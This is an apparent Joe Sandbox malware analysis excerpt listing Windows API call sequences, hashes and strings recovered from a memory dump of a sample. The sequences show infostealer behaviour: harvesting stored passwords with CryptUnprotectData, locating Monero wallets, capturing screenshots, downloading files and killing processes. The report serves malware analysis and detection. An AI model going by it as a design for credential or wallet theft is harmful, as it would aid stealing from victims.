                             • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Similarity
                            • API ID: lstrcpy$lstrlen$AllocLocal
                            • String ID: ERROR
                            • API String ID: 1803462166-2861137601
                            • Opcode ID: c1408c9555630e8a44405b158a279ca0d2820695672560340f301dd62b756180
                            • Instruction ID: b777878c57e0e93e6a0a681a856863ff4ea87f04e18c1130837682968badb5b2
                            • Opcode Fuzzy Hash: c1408c9555630e8a44405b158a279ca0d2820695672560340f301dd62b756180
                            • Instruction Fuzzy Hash: 7C51C031A102019FDB21BF79DD49A6F77A5AF88304F05612EFC469B312DB78DC058B99
                            APIs
                            • GetEnvironmentVariableA.KERNEL32(00FF9480,00669BD8,0000FFFF), ref: 0043A026
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043A053
                            • lstrlen.KERNEL32(00669BD8), ref: 0043A060
                            • lstrcpy.KERNEL32(00000000,00669BD8), ref: 0043A08A
                            • lstrlen.KERNEL32(00464C4C), ref: 0043A095
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043A0B2
                            • lstrcat.KERNEL32(00000000,00464C4C), ref: 0043A0BE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043A0E4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043A0EF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043A114
                            • SetEnvironmentVariableA.KERNEL32(00FF9480,00000000), ref: 0043A12F
                            • LoadLibraryA.KERNEL32(00FE6778), ref: 0043A143
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                             • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                            • String ID:
                            • API String ID: 2929475105-0
                            • Opcode ID: 6fd04c1c6352ec140c3779c5fddf1a4ddc1ebdaca1ef24cb1860b60580b159b9
                            • Instruction ID: 9db2e6412f9a5ba30cb748657cc3afc15aa4c198d03886b84b9332aee64fccde
                            • Opcode Fuzzy Hash: 6fd04c1c6352ec140c3779c5fddf1a4ddc1ebdaca1ef24cb1860b60580b159b9
                            • Instruction Fuzzy Hash: DB91E1716406009FDB309FB4DC44A6737B6EB58708F50615AE945873A2EFFACC508B9A
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0044C8A2
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0044C8D1
                            • lstrlen.KERNEL32(00000000), ref: 0044C8FC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044C932
                            • StrCmpCA.SHLWAPI(00000000,00464C3C), ref: 0044C943
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: 0c8e4e8cb92466213ef0998c01ef465ee364b2253616222a8e8a1ded5dfd5873
                            • Instruction ID: d905b23ac616e6345837098fdd56b89f02862b0634d0bd472e233f670c8d7872
                            • Opcode Fuzzy Hash: 0c8e4e8cb92466213ef0998c01ef465ee364b2253616222a8e8a1ded5dfd5873
                            • Instruction Fuzzy Hash: 3D61B571E122199BEB50EF758984BAF77B9AF09344F18146BE841E7341D778C9018BA8
                            APIs
                            • memset.MSVCRT ref: 0045451A
                            • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00444F39), ref: 00454545
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0045454C
                            • wsprintfW.USER32 ref: 0045455B
                            • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 004545CA
                            • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 004545D9
                            • CloseHandle.KERNEL32(00000000,?,?), ref: 004545E0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                            • String ID: 9OD$%hs$9OD
                            • API String ID: 3729781310-2531002427
                            • Opcode ID: bccb0d394fc2e71c7886e1294dfe38ba813805d08b566aa00c0d9597f8dd69d3
                            • Instruction ID: 83d40d3cf2eacdbb4128b30cfe114f85611d6dd8e73ba2421beabe752928b071
                            • Opcode Fuzzy Hash: bccb0d394fc2e71c7886e1294dfe38ba813805d08b566aa00c0d9597f8dd69d3
                            • Instruction Fuzzy Hash: 12318F72A00209BBDB10DBE4DC45FDEB77DAF85705F10015AFA05E7180EBB4AA458BA9
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00450CF0), ref: 00454276
                            • GetDesktopWindow.USER32 ref: 00454280
                            • GetWindowRect.USER32(00000000,?), ref: 0045428D
                            • SelectObject.GDI32(00000000,00000000), ref: 004542BF
                            • GetHGlobalFromStream.COMBASE(00450CF0,?), ref: 00454336
                            • GlobalLock.KERNEL32(?), ref: 00454340
                            • GlobalSize.KERNEL32(?), ref: 0045434D
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                            • String ID:
                            • API String ID: 1264946473-0
                            • Opcode ID: 48b6c18222aa17157911f3f37f38e5cadc0e3b0dd7d7743dadac9eae2904709a
                            • Instruction ID: 396aae9b5df4b24ec072d7c8e8f233db7a4f267743c21ea9c245d22744fbd82b
                            • Opcode Fuzzy Hash: 48b6c18222aa17157911f3f37f38e5cadc0e3b0dd7d7743dadac9eae2904709a
                            • Instruction Fuzzy Hash: BA516E71A10208AFDB10EFB4DD89AEEB7B9EF48304F10511AF905E7250DBB4AD05CBA0
                            APIs
                            • lstrcat.KERNEL32(?,00FFF2E0), ref: 0044E00D
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0044E037
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044E06F
                            • lstrcat.KERNEL32(?,00000000), ref: 0044E07D
                            • lstrcat.KERNEL32(?,?), ref: 0044E098
                            • lstrcat.KERNEL32(?,?), ref: 0044E0AC
                            • lstrcat.KERNEL32(?,00FEA8A0), ref: 0044E0C0
                            • lstrcat.KERNEL32(?,?), ref: 0044E0D4
                            • lstrcat.KERNEL32(?,00FFE1D0), ref: 0044E0E7
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044E11F
                            • GetFileAttributesA.KERNEL32(00000000), ref: 0044E126
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 4230089145-0
                            • Opcode ID: f5a45c95b4a027db17d4914f22ac6b4a87df03b8869b2020f2b4bb85fc4f9326
                            • Instruction ID: 6aad907e4deaf33740a3a7bc948c96dc68d7dd7ab452b0329e4fa72158262ece
                            • Opcode Fuzzy Hash: f5a45c95b4a027db17d4914f22ac6b4a87df03b8869b2020f2b4bb85fc4f9326
                            • Instruction Fuzzy Hash: 5561BF71A1011CEBDB15EB64CD44ADEB3B9BF4C300F1059AAEA09A3250DFB49F859F94
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00436AFF
                            • InternetOpenA.WININET(0045CFEC,00000001,00000000,00000000,00000000), ref: 00436B2C
                            • StrCmpCA.SHLWAPI(?,00FFF918), ref: 00436B4A
                            • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00436B6A
                            • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00436B88
                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00436BA1
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00436BC6
                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00436BF0
                            • CloseHandle.KERNEL32(00000000), ref: 00436C10
                            • InternetCloseHandle.WININET(00000000), ref: 00436C17
                            • InternetCloseHandle.WININET(?), ref: 00436C21
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                            • String ID:
                            • API String ID: 2500263513-0
                            • Opcode ID: eddace68c2d1428ecd0d8b597da3146a512a42902bf681b20fdbfbdb202ed77a
                            • Instruction ID: 1d020fe9bb66659b2e70d0913763af72f93426786567a51b7aa7ac1308460f09
                            • Opcode Fuzzy Hash: eddace68c2d1428ecd0d8b597da3146a512a42902bf681b20fdbfbdb202ed77a
                            • Instruction Fuzzy Hash: 364190B1600215BFDB20DF64DC49FAE77B9EB48704F009559FA05E7280DFB4AE008BA8
                            APIs
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 0043BC1F
                            • lstrlen.KERNEL32(00000000), ref: 0043BC52
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043BC7C
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043BC84
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0043BCAC
                            • lstrlen.KERNEL32(00464AD4), ref: 0043BD23
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID:
                            • API String ID: 2500673778-0
                            • Opcode ID: 358509910bd6c8118a24e3fe3ead59dc8cb0f56f28c9803cbf7656a230caf122
                            • Instruction ID: 602f65b4f6357f13255d25eb1f8f6d632b42e1c187d8eb66da149c8d7cb360e0
                            • Opcode Fuzzy Hash: 358509910bd6c8118a24e3fe3ead59dc8cb0f56f28c9803cbf7656a230caf122
                            • Instruction Fuzzy Hash: 6FA16F30A00205CFCB25EF29D949B5EB7B5EF48308F24A06EE90597361DB7ADC41CB98
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 00455F2A
                            • std::_Xinvalid_argument.LIBCPMT ref: 00455F49
                            • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00456014
                            • memmove.MSVCRT(00000000,00000000,?), ref: 0045609F
                            • std::_Xinvalid_argument.LIBCPMT ref: 004560D0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_$memmove
                            • String ID: invalid string position$string too long
                            • API String ID: 1975243496-4289949731
                            • Opcode ID: 3956040db99c0fe7a88866a8e3d2f7d37863a0830d11bb86490033734b41cec5
                            • Instruction ID: 92813181ab3a4b8269bd77c718c3552a7c3d7a5123e19eccf6a5616f9bc5d7c6
                            • Opcode Fuzzy Hash: 3956040db99c0fe7a88866a8e3d2f7d37863a0830d11bb86490033734b41cec5
                            • Instruction Fuzzy Hash: B161B271700504EBDB18CF5CC9D096EB3B6EF85706B644A1AE88287382D735ED89CB9D
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044E06F
                            • lstrcat.KERNEL32(?,00000000), ref: 0044E07D
                            • lstrcat.KERNEL32(?,?), ref: 0044E098
                            • lstrcat.KERNEL32(?,?), ref: 0044E0AC
                            • lstrcat.KERNEL32(?,00FEA8A0), ref: 0044E0C0
                            • lstrcat.KERNEL32(?,?), ref: 0044E0D4
                            • lstrcat.KERNEL32(?,00FFE1D0), ref: 0044E0E7
                            • lstrcpy.KERNEL32(00000000,?), ref: 0044E11F
                            • GetFileAttributesA.KERNEL32(00000000), ref: 0044E126
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$AttributesFile
                            • String ID:
                            • API String ID: 3428472996-0
                            • Opcode ID: 92c3c8da89a83b1892112511c4da36c6fca156efcc359eebdea5c65febcdd1ec
                            • Instruction ID: 0ffdaf8f05d24d15a79b0f1981713b448bf6f8e09a34f84087c0228a131154ba
                            • Opcode Fuzzy Hash: 92c3c8da89a83b1892112511c4da36c6fca156efcc359eebdea5c65febcdd1ec
                            • Instruction Fuzzy Hash: 0441C271D1011C9BDB21EB64DD44ADE73B9BF48304F0059AAF90A93251DBB89F858F94
                            APIs
                              • Part of subcall function 004377D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00437805
                              • Part of subcall function 004377D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0043784A
                              • Part of subcall function 004377D0: StrStrA.SHLWAPI(?,Password), ref: 004378B8
                              • Part of subcall function 004377D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004378EC
                              • Part of subcall function 004377D0: HeapFree.KERNEL32(00000000), ref: 004378F3
                            • lstrcat.KERNEL32(00000000,00464AD4), ref: 00437A90
                            • lstrcat.KERNEL32(00000000,?), ref: 00437ABD
                            • lstrcat.KERNEL32(00000000, : ), ref: 00437ACF
                            • lstrcat.KERNEL32(00000000,?), ref: 00437AF0
                            • wsprintfA.USER32 ref: 00437B10
                            • lstrcpy.KERNEL32(00000000,?), ref: 00437B39
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00437B47
                            • lstrcat.KERNEL32(00000000,00464AD4), ref: 00437B60
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                            • String ID: :
                            • API String ID: 398153587-3653984579
                            • Opcode ID: 00a92a618e6350c8d2c195fcb80c80c89e7e9a6fb3c4a023c43dbb4e354ac1c8
                            • Instruction ID: ea9398c398933ef07e3fb0a5b202859c756ac4b728fb2650e03a341622b71ffc
                            • Opcode Fuzzy Hash: 00a92a618e6350c8d2c195fcb80c80c89e7e9a6fb3c4a023c43dbb4e354ac1c8
                            • Instruction Fuzzy Hash: 4A31A9B2A04214AFCF20DBA4DC4496FB77AFB88704F24651FEA4593300DBB9E941CB65
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 0044820C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00448243
                            • lstrlen.KERNEL32(00000000), ref: 00448260
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00448297
                            • lstrlen.KERNEL32(00000000), ref: 004482B4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004482EB
                            • lstrlen.KERNEL32(00000000), ref: 00448308
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00448337
                            • lstrlen.KERNEL32(00000000), ref: 00448351
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00448380
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 67571de08413ab8b8d83c3da2a6be880889d2e5366a50ad96aab7c145d942c3f
                            • Instruction ID: b81198f8b90b83f8666b30b969ada1db92bef62a68dd47b9f03513b955a7bb57
                            • Opcode Fuzzy Hash: 67571de08413ab8b8d83c3da2a6be880889d2e5366a50ad96aab7c145d942c3f
                            • Instruction Fuzzy Hash: BA517B71A006029BEB10EF39D958A6FB7A8EF44740F11451AED06DB344EB79ED50CBE4
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00437805
                            • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0043784A
                            • StrStrA.SHLWAPI(?,Password), ref: 004378B8
                              • Part of subcall function 00437750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0043775E
                              • Part of subcall function 00437750: RtlAllocateHeap.NTDLL(00000000), ref: 00437765
                              • Part of subcall function 00437750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0043778D
                              • Part of subcall function 00437750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004377AD
                              • Part of subcall function 00437750: LocalFree.KERNEL32(?), ref: 004377B7
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004378EC
                            • HeapFree.KERNEL32(00000000), ref: 004378F3
                            • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00437A35
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                            • String ID: Password
                            • API String ID: 356768136-3434357891
                            • Opcode ID: a193693a291b6810df8708b1763eba02b8251df906962ea25eaa5ad3b5e6e629
                            • Instruction ID: b73b9ad4ab2fcad9d7f029d5a15f9a10285b6b52bfb50efdc1d8a3604448a900
                            • Opcode Fuzzy Hash: a193693a291b6810df8708b1763eba02b8251df906962ea25eaa5ad3b5e6e629
                            • Instruction Fuzzy Hash: 497151B1D0021DAFDB10DF95CC80ADEBBB9EF49300F1055AAE509A7240EB755A85CFA5
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00431135
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0043113C
                            • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00431159
                            • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00431173
                            • RegCloseKey.ADVAPI32(?), ref: 0043117D
                            Strings
                            • SOFTWARE\monero-project\monero-core, xrefs: 0043114F
                            • wallet_path, xrefs: 0043116D
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                            • API String ID: 3225020163-4244082812
                            • Opcode ID: 5cd21aa1884b0edcc3b49cf03bd937ae028bdd0a9c091f0fdcb48e5daed24c74
                            • Instruction ID: f35857a8eaa5f45fa601de5f38a7ac08f467b7aaec3feb504cf7c1cd575aa97e
                            • Opcode Fuzzy Hash: 5cd21aa1884b0edcc3b49cf03bd937ae028bdd0a9c091f0fdcb48e5daed24c74
                            • Instruction Fuzzy Hash: 81F03075640308BFDB109BE09D4DFEB7B7DEB04756F100155FE05E2290EAF45A4497A1
                            APIs
                            • memcmp.MSVCRT(?,v20,00000003), ref: 00439E04
                            • memcmp.MSVCRT(?,v10,00000003), ref: 00439E42
                            • LocalAlloc.KERNEL32(00000040), ref: 00439EA7
                              • Part of subcall function 004571E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004571FE
                            • lstrcpy.KERNEL32(00000000,00464C48), ref: 00439FB2
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpymemcmp$AllocLocal
                            • String ID: @$v10$v20
                            • API String ID: 102826412-278772428
                            • Opcode ID: f38887ccfaa518c4a0b89165d9b2330fdc039b104899f706754542eee58db585
                            • Instruction ID: fe2071b43d760e97dc94714ef43d8a2134b0535ecfe804e8aa56756f81ea48ef
                            • Opcode Fuzzy Hash: f38887ccfaa518c4a0b89165d9b2330fdc039b104899f706754542eee58db585
                            • Instruction Fuzzy Hash: B351B131A103099BDB10EF65DC81B9E77A4EF48318F15602AFD49EB351DBB8ED058B98
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0043565A
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00435661
                            • InternetOpenA.WININET(0045CFEC,00000000,00000000,00000000,00000000), ref: 00435677
                            • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00435692
                            • InternetReadFile.WININET(?,?,00000400,00000001), ref: 004356BC
                            • memcpy.MSVCRT(00000000,?,00000001), ref: 004356E1
                            • InternetCloseHandle.WININET(?), ref: 004356FA
                            • InternetCloseHandle.WININET(00000000), ref: 00435701
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                            • String ID:
                            • API String ID: 1008454911-0
                            • Opcode ID: 9d51945bce78a92ad7d2e68c44ced175ae16db793b43a052299a092a1cd3cf87
                            • Instruction ID: 50cf241802207a6c61a1e70ff6dfa3d5b1dce750212e357c191150fe29fb9ed1
                            • Opcode Fuzzy Hash: 9d51945bce78a92ad7d2e68c44ced175ae16db793b43a052299a092a1cd3cf87
                            • Instruction Fuzzy Hash: 2E41A370A00605EFDB24CF54DD88FAAB7B9FF48304F24916AE9089B391D7759941CF98
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00454759
                            • Process32First.KERNEL32(00000000,00000128), ref: 00454769
                            • Process32Next.KERNEL32(00000000,00000128), ref: 0045477B
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0045479C
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 004547AB
                            • CloseHandle.KERNEL32(00000000), ref: 004547B2
                            • Process32Next.KERNEL32(00000000,00000128), ref: 004547C0
                            • CloseHandle.KERNEL32(00000000), ref: 004547CB
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 3836391474-0
                            • Opcode ID: 757b8156209ce7ed14b63749a4ffb0b814b37d5df4a50af20263fb9819fa4a50
                            • Instruction ID: 7badd1c3a26205f5926f4967b30690c7b7aae10ddf7d27e1a7b95a3b56b44739
                            • Opcode Fuzzy Hash: 757b8156209ce7ed14b63749a4ffb0b814b37d5df4a50af20263fb9819fa4a50
                            • Instruction Fuzzy Hash: 4E01F531601214AFE7205B709C88FEB77BDEB88756F001285FD05D6282EFB48DC88A64
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00448435
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044846C
                            • lstrlen.KERNEL32(00000000), ref: 004484B2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004484E9
                            • lstrlen.KERNEL32(00000000), ref: 004484FF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044852E
                            • StrCmpCA.SHLWAPI(00000000,00464C3C), ref: 0044853E
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: ed1f366fc5159db7f74d3783d81f3af8bf939d8101bcc4fafd67657353fef42f
                            • Instruction ID: 2a6c902bc2ae4ebd2631b939d2910b754dc9315a3988ce74009c3c39074558dd
                            • Opcode Fuzzy Hash: ed1f366fc5159db7f74d3783d81f3af8bf939d8101bcc4fafd67657353fef42f
                            • Instruction Fuzzy Hash: AD519E75A002069FDB20DF28D984A5BB7F9EF58340F24945EEC86EB345EB38E9418B54
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00452925
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0045292C
                            • RegOpenKeyExA.ADVAPI32(80000002,00FEB6F0,00000000,00020119,004528A9), ref: 0045294B
                            • RegQueryValueExA.ADVAPI32(004528A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00452965
                            • RegCloseKey.ADVAPI32(004528A9), ref: 0045296F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
